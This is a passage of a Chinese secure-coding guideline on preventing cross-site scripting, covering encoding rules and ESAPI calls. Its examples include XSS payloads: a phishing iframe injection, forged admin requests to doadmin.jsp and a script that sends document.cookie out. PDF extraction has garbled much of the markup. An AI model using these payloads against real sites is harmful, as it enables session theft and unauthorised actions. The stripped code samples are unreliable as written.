1、四川电科院信息系统 代码安全编写规范北京恒华伟业科技股份有限公司WEB 安全评测解决方案与代码编写规范北京恒华伟业科技股份有限公司2013 年 10 月四川电科院信息系统 代码安全编写规范北京恒华伟业科技股份有限公司目录1 Xss 注入简介 .21.1 一个简单的例子 21.2 网上的 xss 讲解 32 防御 xss 的七条原则 92.1 前言 92.2 原则 1:不要在页面中插入任何不可信数据,除非这些数已经据根据下面几个原则进行了编码 102.3 原则 2:在将不可信数据插入到 HTML 标签之间时,对这些数据进行 HTML Entity 编码 .112.4 原则 3:在将不可信数据插入
2、到 HTML 属性里时,对这些数据进行 HTML 属性编码 122.5 原则 4:在将不可信数据插入到 SCRIPT 里时,对这些数据进行 SCRIPT 编码142.6 原则 5:在将不可信数据插入到 Style 属性里时,对这些数据进行 CSS 编码 .162.7 原则 6:在将不可信数据插入到 HTML URL 里时,对这些数据进行 URL 编码172.8 原则 7:使用富文本时,使用 XSS 规则引擎进行编码过滤 .183 项目中防御 xss 的具体措施 213.1 在 jsp 中的输出防御 .213.1.1 stuts 标签输出防御 .213.1.2 Esapi 标签输出防御 213.
3、1.3 Java 输出代码防御通过的方式 224 防御 url 中的 xss 代码注入攻击办法 235 控制通过输入非登录页的 url 进入系统功能 .245.1.1 Referer 验证过滤器 .245.1.2 window.open 和 window.location.href=特殊处理 .246 系统日志组件的调用方法 256.1.1 方法一:直接调用 256.1.2 方法二通过 Annotation.25四川电科院信息系统 代码安全编写规范北京恒华伟业科技股份有限公司 21 Xss 注入简介1.1 一个简单的例子先看下现在 frp 登录页面的 xss 注入漏洞先打开系统登录页http:
4、/192.168.2.99:8080/scmm/然后在系统用户名中文本框中输入1, xss: */“alert(/xsstest/);密码为 1点击登录按钮,则出现如下界面原因是系统验证用户名失败后,重新跳转到 login.jsp而 login.jsp 中通过$userCode的方式对 userCode 变量进行了直接的页面输出,从而执行了不安全的脚本,正确的方式使应当对 userCode 进行字符编码转换后再进行输出,具体的编码转换输出方式,请参照第三章节再比如在一个博客添加页面 blogAdd.jsp 中有一个 form 表单Form 表单提交后跳转到 blogInfo.jsp如果在 js
5、 中使用 blog.subjectVar blogSubject =”;四川电科院信息系统 代码安全编写规范北京恒华伟业科技股份有限公司 3如果我在 from 表单中 blog.subject 文本框中输入“ var myiframe=document.createElement(“iframe”);myiframe.style.height=”100px;”; myiframe.style.width=”100px;”myiframe.src=”http:/”;document.getElementsByTagName(body)0.appendChild(myiframe);则会成功在你的
6、网站上显示出一个百度的页面,使用类似的代码可以实现网站钓鱼功能例如创建一个支付页面,引诱你把账号和密码输入到钓鱼网站中正确的做法是对用户输入 blog.subject 文本框中的值进行非法字符过滤后再保存到数据库或者在对 blog.subject 的字段值进行输出的时候进行字符转换转换方式是将Var blogSubject =”;修改为Var blogSubject =”;因为 struts 的 property 标签默认只对输出的值进行 html 过滤,而不对 javaScript 进行过滤1.2 网上的 xss 讲解XSS 漏洞概述: XSS(Cross Site Script)跨站点脚本
7、攻击是一种注射的问题,在这种恶意脚本注入否则良性和信任的网站类型。跨站点脚本(XSS)攻击,攻击者使用时,会出现一个网络应用程序发送恶意代码,一般是在浏览器端脚本的形式,向不同的最终用户。这些缺陷,使攻击成功是相当普遍,发生在任何地方从一个 Web应用程序使用在输出它没有验证或编码了用户输入。攻击者可以使用 XSS 的恶意脚本发送到一个毫无戒心的用户。最终用户的浏览有没有办法知道该脚本不应该信任,将执行该脚本。因为它认为该脚本来从一个受信任的源,恶意脚本可以访问任何 Cookie,会话令牌,或其他敏感信息的浏览器保留,并与该网站使用。 甚至可以重写这些脚本的 HTML 网页的内容。 XSS 漏
8、洞历史: XSS(Cross-site scripting)漏洞最早可以追溯到 1996 年,那时电子商务才刚刚起步,估计那时候国内很少人会想象到今天出现的几个国内电子商务巨头淘宝、当当、亚马逊(卓越)。XSS 的出现“得益”于 JavaScript 的出现,JavaScript 的出现给网页的设计带来了无限惊喜,包括今天风行的AJAX(Asynschronous JavaScript and XML)。同时,这些元素又无限的扩充了今天的网络安全领域。 XSS 漏洞攻击特点: (1)XSS 跨站漏洞种类多样人: XSS 攻击语句可插入到、URL 地址参数后面、输入框内、img 标签及 DIV
9、标签等HTML 函数的属人里、Flash 的 getURL()动作等地方都会触发 XSS 漏洞。 (2)XSS 跨站漏洞代码多样人: 为了躲避转义 HTML 特殊字符函数及过滤函数的过滤,XSS 跨站的代码使用四川电科院信息系统 代码安全编写规范北京恒华伟业科技股份有限公司 4“/”来代替安字符“”、使用 Tab 键代替空格、部分语句转找成 16 进制、添加特殊字符、改变大小写及使用空格等来绕过过滤函数。 如果在您的新闻系统发现安全漏洞,如果该漏洞是一个 SQL 注入漏洞,那么该漏洞就会得到您的网站管理员密码、可以在主机系统上执行 shell 命令、对数据库添加、删除数据。如果在您的新闻或邮件
10、系统中发现安全漏洞,如果该漏洞是一个 XSS 跨站漏洞,那么可以构造一些特殊代码,只要你访问的页面包含了构造的特殊代码,您的主机可能就会执行木马程序、执行*Cookies 代码、突然转到一个银行及其它金融类的网站、泄露您的网银及其它账号与密码等。 XSS 攻击原理: XSS 属于被动式的攻击。攻击者先构造一个跨站页面,利用script、等各种方式使得用户浏览这个页面时,触发对被攻击站点的 http 请求。此时,如果被攻击者如果已经在被攻击站点登录,就会持有该站点 cookie。这样该站点会认为被攻击者发起了一个 http 请求。而实际上这个请求是在被攻击者不知情的情况下发起的,由此攻击者在一定
11、程度上达到了冒充被攻击者的目的。精心的构造这个攻击请求,可以达到冒充发文,夺取权限等等多个攻击目的。在常见的攻击实例中,这个请求是通过 script 来发起的,因此被称为 Cross Site Script。攻击 Yahoo Mail 的 Yamanner 蠕虫是一个著名的 XSS 攻击实例。Yahoo Mail 系统有一个漏洞,当用户在 web 上察看信件时,有可能执行到信件内的 javascript 代码。病毒可以利用这个漏洞使被攻击用户运行病毒的 script。同时 Yahoo Mail 系统使用了 Ajax 技术,这样病毒的 script 可以很容易的向 Yahoo Mail 系统发起
12、 ajax 请求,从而得到用户的地址簿,并发送病毒给他人。 XSS 攻击主要分为两类:一类是来自内部的攻击,主要指的是利用 WEB 程序自身的漏洞,提交特殊的字符串,从而使得跨站页面直接存在于被攻击站点上,这个字符串被称为跨站语句。这一类攻击所利用的漏洞非常类似于 SQL Injection 漏洞,都是 WEB 程序没有对用户输入作充分的检查和过滤。上文的Yamanner 就是一例。 另一类则是来来自外部的攻击,主要指的自己构造 XSS 跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。如当我们要渗透一个站点,我们自己构造一个跨站网页放在自己的服务器上,然后通过结合其它技术,如社会工程学等,
13、欺骗目标服务器的管理员打开。这一类攻击的威胁相对较低,至少 ajax 要发起跨站调用是非常困难的。 案例实战: 我们来看一个简单的攻击实例,下表给出了一个简单的网站http:/:8080/testxss,该网站的密码和用户名相同,普通用户可以修改 user value,当以 admin 身份登陆时可以通过向 doadmin.jsp 发起请求来修改 admin value。 index.jsp Current User: $username 四川电科院信息系统 代码安全编写规范北京恒华伟业科技股份有限公司 5Admin Value: $adminvalue User Value: $userva
14、lue logout Login: username: password: password = username :-) adminvalue: uservalue: login.jsp doadmin.jsp 容易想到,只要诱骗 admin 用户发起一个到http:/:8080/testxss/doadmin.jsp 的 http 请求,就能成功攻击。因此我们设计跨站语句如下: hello hello document.forms0.submit() hello v = new ActiveXObject(“MSXML2.XMLHTTP.3.0“); v. open(“GET“,“http
15、:/:8080/testxss/doadmin.jsp?v=hacked4“); v.send();alert(v.status Text);以普通用户身份修改 user value 为以上任何一个,当 admin 浏览 index.jsp 时,即可悄无声息的修改 admin value 这里演示了 3 种跨站手法: 1 是利用 img、iframe 等 tag 直接发起请求,这适用于无法直接出 script 的情况,其中 http:/ 是一个 redirect,指向 http:/:8080/testxss/doadmin.jsp?v=hacked2 ; 2 是用 script 提交 post
16、 表单; 3 是 ajax 技术。 以上攻击能够成功有 2 个原因: 1. 应用程序没有对 user value 做足够多的过滤,导致用户有机会构造一个复杂的跨站语句来触发 admin 的非预期行为; 2. 应用程序在响应 admin value 修改请求时没有防范措施来识别这是不是出于用户主动。 漏洞 1 很容易修复,只要像防止 SQL Injection 那样对用户输入的所有内容都过滤即可。 漏洞 2 才是问题的根源,即便我们修补了漏洞 1,只要诱使 admin 用户访问包含 的页面,仍然能达到目的,而这是一件极容易 做到的事。 四川电科院信息系统 代码安全编写规范北京恒华伟业科技股份有限
17、公司 7防范措施: 这里给出一些防范 XSS 攻击的措施。必须说明的是,对于 XSS 攻击,并不像SQLInjection 那样可以有一劳永逸的解决方案只需要 grep 一下所有的sql 调用。这是一 场长期的斗争,而且往往需要我们采取修改业务流程、产品设计等看似削足适履的手段。 先总结一下常见的攻击手法: 1. 依赖跨站漏洞,需要在被攻击网站的页面种入脚本的手法 1.1. Cookie 盗取,通过 javascript 获取被攻击网站种下的 cookie,并发送给攻击者。 1.1.1. 从 cookie 中提取密码等隐私 1.1.2. 利用 cookie 伪造 session,发起重放攻击
18、1.2. Ajex 信息盗取,通过 javascript 发起 ajex 请求。 1.2.1. 从 ajex 结果中获取隐私。 1.2.2. 模拟用户完成多页表单。 2. 不依赖跨站漏洞的手法 2.1. 单向 HTTP 动作,通过 img.src 等方法发起跨站访问,冒充被攻击者执行特权操作。但是很难拿到服务器的返回值。 2.2. 双向 HTTP 动作,如果服务器产生一段动态的 script,那么可以用script.src 的方法发起跨站访问并拿到服务器的返回值。 防范手法如下: 1. 防堵跨站漏洞,阻止攻击者利用在被攻击网站上发布跨站攻击语句不可以信任用户提交的任何内容,首先代码里对用户输入
19、的地方和变量都需要仔细检查长度和对”,”;”,”等字符做过滤;其次任何内容写到页面之前都必须加以 encode,避免不小心把 html tag 弄出来。这一个层面做好,至少可以堵住超过一半的 XSS 攻击。 2. Cookie 防盗 首先避免直接在 cookie 中泄露用户隐私,例如 email、密码等等。其次通过使cookie 和系统 ip 绑定来降低 cookie 泄露后的危险。这样攻击者得到的cookie 没有实际价值,不可能拿来重放。 3. 尽量采用 POST 而非 GET 提交表单 POST 操作不可能绕开 javascript 的使用,这会给攻击者增加难度,减少可利用的 跨站漏洞。
20、 4. 严格检查 refer 检查 http refer 是否来自预料中的 url。这可以阻止第 2 类攻击手法发起的http 请求,也能防止大部分第 1 类攻击手法,除非正好在特权操作的引用页上种了跨站访问。 5. 将单步流程改为多步,在多步流程中引入效验码 多步流程中每一步都产生一个验证码作为 hidden 表单元素嵌在中间页面,下一步操作时这个验证码被提交到服务器,服务器检查这个验证码是否匹配。 首先这为第 1 类攻击者大大增加了麻烦。其次攻击者必须在多步流程中拿到上四川电科院信息系统 代码安全编写规范北京恒华伟业科技股份有限公司 8一步产生的效验码才有可能发起下一步请求,这在第 2 类
21、攻击中是几乎无法做到的。 6. 引入用户交互 简单的一个看图识数可以堵住几乎所有的非预期特权操作。 7. 只在允许 anonymous 访问的地方使用动态的 javascript。 8. 对于用户提交信息的中的 img 等 link,检查是否有重定向回本站、不是真的图片等 可疑操作。 9. 内部管理网站的问题 很多时候,内部管理网站往往疏于关注安全问题,只是简单的限制访问来源。这种网站往往对 XSS 攻击毫无抵抗力,需要多加注意。安全问题需要长期的关注,从来不是一锤子买卖。XSS 攻击相对其他攻击手段更加隐蔽和多变,和业务流程、代码实现都有关系,不存在什么一劳永逸的解决方案。此外,面对XSS,
22、往往要牺牲产品的便利性才能保证完全的安全,如何在安全和便利之间平衡也是一件需要考虑的事情。 web 应用开发者注意事项: 1.对于开发者,首先应该把精力放到对所有用户提交内容进行可靠的输入验证上。这些提交内容包括 URL、查询关键 字、http 头、post 数据等。只接受在你所规定长度范围内、采用适当格式、你所希望的字符。阻塞、过滤或者忽略其它的 任何东西。 2.保护所有敏感的功能,以防被 bots 自动化或者被第三方网站所执行。实现 session 标记(session tokens)、 CAPTCHA 系统或者 HTTP 引用头检查。 3.如果你的 web 应用必须支持用户提供的 HTM
23、L,那么应用的安全性将受到灾难性的下滑。但是你还是可以做一些事来 保护 web 站点:确认你接收的 HTML 内容被妥善地格式化,仅包含最小化的、安全的 tag(绝对没有 JavaScript),去掉任何 对远程内容的引用(尤其是样式表和 JavaScript)。为了更多的安全,请使用httpOnly 的 cookie。四川电科院信息系统 代码安全编写规范北京恒华伟业科技股份有限公司 92 防御 xss 的七条原则2.1 前言 本章节将会着重介绍防御 XSS 攻击的一些原则,需要读者对于 XSS 有所了解,至少知道 XSS 漏洞的基本原理,如果您对此不是特别清楚,请参考这两篇文章: Store
24、d and Reflected XSS Attack DOM Based XSS攻击者可以利用 XSS 漏洞向用户发送攻击脚本,而用户的浏览器因为没有办法知道这段脚本是不可信的,所以依然会执行它。对于浏览器而言,它认为这段脚本是来自可以信任的服务器的,所以脚本可以光明正大地访问 Cookie,或者保存在浏览器里被当前网站所用的敏感信息,甚至可以知道用户电脑安装了哪些软件。这些脚本还可以改写 HTML 页面,进行钓鱼攻击。虽然产生 XSS 漏洞的原因各种各样,对于漏洞的利用也是花样百出,但是如果我们遵循本文提到防御原则,我们依然可以做到防止 XSS 攻击的发生。有人可能会问,防御 XSS 的核心
25、不就是在输出不可信数据的时候进行编码,而现如今流行的 Web 框架(比如 Rails)大多都在默认情况下就对不可信数据进行了 HTML 编码,帮我们做了防御,还用得着我们自己再花时间研究如何防御 XSS 吗?答案是肯定的,对于将要放置到 HTML 页面 body里的不可信数据,进行 HTML 编码已经足够防御 XSS 攻击了,甚至将HTML 编码后的数据放到 HTML 标签(TAG)的属性( attribute)里也不会产生 XSS 漏洞(但前提是这些属性都正确使用了引号) ,但是,如果你将HTML 编码后的数据放到了标签里的任何地方,甚至是 HTML 标签的事件处理属性里(如 onmouse
26、over) ,又或者是放到了 CSS、URL 里,XSS 攻击依然会发生,在这种情况下, HTML 编码不起作用了。所以就算你到处使用了 HTML 编码,XSS 漏洞依然可能存在。下面这几条规则就将告诉你,如何在正确的地方使用正确的编码来消除 XSS 漏洞。四川电科院信息系统 代码安全编写规范北京恒华伟业科技股份有限公司 102.2 原则 1:不要在页面中插入任何不可信数据,除非这些数已经据根据下面几个原则进行了编码第一条原则其实是“Secure By Default”原则:不要往 HTML 页面中插入任何不可信数据,除非这些数据已经根据下面几条原则进行了编码。之所以有这样一条原则存在,是因为
27、 HTML 里有太多的地方容易形成XSS 漏洞,而且形成漏洞的原因又有差别,比如有些漏洞发生在 HTML 标签里,有些发生在 HTML 标签的属性里,还有的发生在页面的 里,甚至有些还出现在 CSS 里,再加上不同的浏览器对页面的解析或多或少有些不同,使得有些漏洞只在特定浏览器里才会产生。如果想要通过 XSS 过滤器(XSS Filter)对不可信数据进行转义或替换,那么 XSS 过滤器的过滤规则将会变得异常复杂,难以维护而且会有被绕过的风险。所以实在想不出有什么理由要直接往 HTML 页面里插入不可信数据,就算是有 XSS 过滤器帮你做过滤,产生 XSS 漏洞的风险还是很高。不要在这里直接插
28、入不可信数据直接插入到 SCRIPT 标签里 插入到 HTML 注释里插入到 HTML 标签的属性名里插入到 HTML 标签的属性值里四川电科院信息系统 代码安全编写规范北京恒华伟业科技股份有限公司 11作为 HTML 标签的名字不要在这里直接插入不可信数据直接插入到 CSS 里最重要的是,千万不要引入任何不可信的第三方 JavaScript 到页面里,一旦引入了,这些脚本就能够操纵你的 HTML 页面,窃取敏感信息或者发起钓鱼攻击等等。2.3 原则 2:在将不可信数据插入到 HTML标签之间时,对这些数据进行 HTML Entity 编码在这里相当强调是往 HTML 标签之间插入不可信数据,
29、以区别于往HTML 标签属性部分插入不可信数据,因为这两者需要进行不同类型的编码。当你确实需要往 HTML 标签之间插入不可信数据的时候,首先要做的就是对不可信数据进行 HTML Entity 编码。比如,我们经常需要往DIV,P,TD 这些标签里放入一些用户提交的数据,这些数据是不可信的,需要对它们进行 HTML Entity 编码。很多 Web 框架都提供了 HTML Entity编码的函数,我们只需要调用这些函数就好,而有些 Web 框架似乎更“智能” ,比如 Rails,它能在默认情况下对所有插入到 HTML 页面的数据进行HTML Entity 编码,尽管不能完全防御 XSS,但着实
30、减轻了开发人员的负担。插入不可信数据前,对其进行 HTML Entity 编码 插入不可信数据前,对其进行 HTML Entity 编码 插入不可信数据前,对其进行 HTML Entity 编码 以此类推,往其他 HTML 标签之间插入不可信数据前,对其进行 HTML Entity 编码编码规则那么 HTML Entity 编码具体应该做哪些事情呢?它需要对下面这 6 个四川电科院信息系统 代码安全编写规范北京恒华伟业科技股份有限公司 12特殊字符进行编码: ” / 有两点需要特别说明的是: 不推荐将单引号( )编码为 因为它并不是标准的 HTML 标签 需要对斜杠号( / )编码,因为在进行
31、 XSS 攻击时,斜杠号对于关闭当前HTML 标签非常有用推荐使用 OWASP 提供的 ESAPI 函数库,它提供了一系列非常严格的用于进行各种安全编码的函数。在当前这个例子里,你可以使用:String encodedContent = ESAPI.encoder().encodeForHTML(request.getParameter(“input”);2.4 原则 3:在将不可信数据插入到 HTML属性里时,对这些数据进行 HTML属性编码这条原则是指,当你要往 HTML 属性(例如 width、name、value 属性)的值部分(data value)插入不可信数据的时候,应该对数据进
32、行 HTML 属性编码。不过需要注意的是,当要往 HTML 标签的事件处理属性(例如onmouseover)里插入数据的时候,本条原则不适用,应该用下面介绍的原则 4 对其进行 JavaScript 编码。四川电科院信息系统 代码安全编写规范北京恒华伟业科技股份有限公司 13属性值部分没有使用引号,不推荐 属性值部分使用了单引号属性值部分使用了双引号编码规则除了阿拉伯数字和字母,对其他所有的字符进行编码,只要该字符的ASCII 码小于 256。编码后输出的格式为 (以 img.src = ”http:/ + escape(document.cookie);document.body.appen
33、dChild(img); | (反单引号,IE 会认为它是单引号)可以使用 ESAPI 提供的函数进行 HTML 属性编码:String encodedContent = ESAPI.encoder().encodeForHTMLAttribute(request.getParameter(“input”);2.5 原则 4:在将不可信数据插入到SCRIPT 里时,对这些数据进行SCRIPT 编码这条原则主要针对动态生成的 JavaScript 代码,这包括脚本部分以及HTML 标签的事件处理属性(Event Handler,如 onmouseover, onload 等) 。在往 JavaS
34、cript 代码里插入数据的时候,只有一种情况是安全的,那就是对不可信数据进行 JavaScript 编码,并且只把这些数据放到使用引号包围起来的值部分(data value)之中,例如:?12345var message = “”; 除此之外,往 JavaScript 代码里其他任何地方插入不可信数据都是相当危险的,攻击者可以很容易地插入攻击代码。alert(插入不可信数据前,进行 JavaScript 编码)值部分使用了单引号 四川电科院信息系统 代码安全编写规范北京恒华伟业科技股份有限公司 15x = “插入不可信数据前,进行 JavaScript 编码” 值部分使用了双引号值部分使用了
35、引号,且事件处理属性的值部分也使用了引号特别需要注意的是,在 XSS 防御中,有些 JavaScript 函数是极度危险的,就算对不可信数据进行 JavaScript 编码,也依然会产生 XSS 漏洞,例如:window.setInterval(就算对不可信数据进行了 JavaScript 编码,这里依然会有 XSS 漏洞);编码规则除了阿拉伯数字和字母,对其他所有的字符进行编码,只要该字符的ASCII 码小于 256。编码后输出的格式为 xHH (以 x 开头,HH 则是指该字符对应的十六进制数字)在对不可信数据做编码的时候,千万不能图方便使用反斜杠( )对特殊字符进行简单转义,比如将双引号
36、 ” 转义成 ” ,这样做是不可靠的,因为浏览器在对页面做解析的时候,会先进行 HTML 解析,然后才是JavaScript 解析,所以双引号很可能会被当做 HTML 字符进行 HTML 解析,这时双引号就可以突破代码的值部分,使得攻击者可以继续进行 XSS 攻击。例如:假设代码片段如下:四川电科院信息系统 代码安全编写规范北京恒华伟业科技股份有限公司 16var message = ” $VAR “;攻击者输入的内容为:”; alert(xss);/如果只是对双引号进行简单转义,将其替换成 ” 的话,攻击者输入的内容在最终的页面上会变成:?12345var message = ” ”; al
37、ert(xss);/ “; 浏览器在解析的时候,会认为反斜杠后面的那个双引号和第一个双引号相匹配,继而认为后续的 alert(xss)是正常的 JavaScript 脚本,因此允许执行。可以使用 ESAPI 提供的函数进行 JavaScript 编码:String encodedContent = ESAPI.encoder().encodeForJavaScript(request.getParameter(“input”);2.6 原则 5:在将不可信数据插入到 Style属性里时,对这些数据进行 CSS 编码当需要往 Stylesheet,Style 标签或者 Style 属性里插入不可
38、信数据的时候,需要对这些数据进行 CSS 编码。传统印象里 CSS 不过是负责页面样式四川电科院信息系统 代码安全编写规范北京恒华伟业科技股份有限公司 17的,但是实际上它比我们想象的要强大许多,而且还可以用来进行各种攻击。因此,不要对 CSS 里存放不可信数据掉以轻心,应该只允许把不可信数据放入到 CSS 属性的值部分,并进行适当的编码。除此以外,最好不要把不可信数据放到一些复杂属性里,比如 url, behavior 等,只能被 IE 认识的 Expression 属性允许执行 JavaScript 脚本,因此也不推荐把不可信数据放到这里。selector property : 插入不可信
39、数据前,进行 CSS 编码 selector property : ” 插入不可信数据前,进行CSS 编码 “ 编码规则除了阿拉伯数字和字母,对其他所有的字符进行编码,只要该字符的ASCII 码小于 256。编码后输出的格式为 HH (以 开头,HH 则是指该字符对应的十六进制数字)同原则 2,原则 3,在对不可信数据进行编码的时候,切忌投机取巧对双引号等特殊字符进行简单转义,攻击者可以想办法绕开这类限制。可以使用 ESAPI 提供的函数进行 CSS 编码:String encodedContent = ESAPI.encoder().encodeForCSS(request.getParam
40、eter(“input”);2.7 原则 6:在将不可信数据插入到 HTML URL 里时,对这些数据进行 URL 编码当需要往 HTML 页面中的 URL 里插入不可信数据的时候,需要对其进行 URL 编码,如下:Link Content 四川电科院信息系统 代码安全编写规范北京恒华伟业科技股份有限公司 18编码规则除了阿拉伯数字和字母,对其他所有的字符进行编码,只要该字符的ASCII 码小于 256。编码后输出的格式为 %HH (以 % 开头,HH 则是指该字符对应的十六进制数字)在对 URL 进行编码的时候,有两点是需要特别注意的:1) URL 属性应该使用引号将值部分包围起来,否则攻击
41、者可以很容易突破当前属性区域,插入后续攻击代码2) 不要对整个 URL 进行编码,因为不可信数据可能会被插入到 href, src 或者其他以 URL 为基础的属性里,这时需要对数据的起始部分的协议字段进行验证,否则攻击者可以改变 URL 的协议,例如从 HTTP 协议改为DATA 伪协议,或者 javascript 伪协议。可以使用 ESAPI 提供的函数进行 URL 编码:String encodedContent = ESAPI.encoder().encodeForURL(request.getParameter(“input”);ESAPI 还提供了一些用于检测不可信数据的函数,在这
42、里我们可以使用其来检测不可信数据是否真的是一个 URL:?12345678String userProvidedURL = request.getParameter(“userProvidedURL”);boolean isValidURL = ESAPI.validator().isValidInput(“URLContext”, userProvidedURL, “URL”, 255, false); if (isValidURL) ” 四川电科院信息系统 代码安全编写规范北京恒华伟业科技股份有限公司 192.8 原则 7:使用富文本时,使用 XSS 规则引擎进行编码过滤Web 应用一般都
43、会提供用户输入富文本信息的功能,比如 BBS 发帖,写博客文章等,用户提交的富文本信息里往往包含了 HTML 标签,甚至是JavaScript 脚本,如果不对其进行适当的编码过滤的话,则会形成 XSS 漏洞。但我们又不能因为害怕产生 XSS 漏洞,所以就不允许用户输入富文本,这样对用户体验伤害很大。针对富文本的特殊性,我们可以使用 XSS 规则引擎对用户输入进行编码过滤,只允许用户输入安全的 HTML 标签,如, , 等,对其他数据进行 HTML 编码。需要注意的是,经过规则引擎编码过滤后的内容只能放在, 等安全的 HTML 标签里,不要放到 HTML 标签的属性值里,更不要放到 HTML 事
44、件处理属性里,或者放到 标签里。推荐 XSS 规则过滤引擎: OWASP AntiSamp 或者 Java HTML Sanitizer总结由于很多地方都可能产生 XSS 漏洞,而且每个地方产生漏洞的原因又各有不同,所以对于 XSS 的防御来说,我们需要在正确的地方做正确的事情,即根据不可信数据将要被放置到的地方进行相应的编码,比如放到 标签之间的时候,需要进行 HTML 编码,放到标签属性里的时候,需要进行 HTML 属性编码,等等。XSS 攻击是在不断发展的,上面介绍的几条原则几乎涵盖了 Web 应用里所有可能出现 XSS 的地方,但是我们仍然不能掉以轻心,为了让 Web 应用更加安全,我
45、们还可以结合其他防御手段来加强 XSS 防御的效果,或者减轻损失: 对用户输入进行数据合法性验证,例如输入 email 的文本框只允许输入格式正确的 email,输入手机号码的文本框只允许填入数字且格式需要正确。这四川电科院信息系统 代码安全编写规范北京恒华伟业科技股份有限公司 20类合法性验证至少需要在服务器端进行以防止浏览器端验证被绕过,而为了提高用户体验和减轻服务器压力,最好也在浏览器端进行同样的验证。 为 Cookie 加上 HttpOnly 标记。许多 XSS 攻击的目标就是窃取用户Cookie,这些 Cookie 里往往包含了用户身份认证信息(比如 SessionId) ,一旦被盗,黑客就可以冒充用户身份盗取用户账号。窃取 Cookie 一般都会依赖 JavaScript 读取 Cookie 信息,而 HttpOnly 标记则会告诉浏览器,被标记上的 Cookie 是不允许任何脚本读取或修改的,这样即使 Web 应用产生了XSS 漏洞,Cookie 信息也能得到较好的保护,达到减轻损失的目的。Web 应用变得越来越复杂,也越来越容易产生各种漏洞而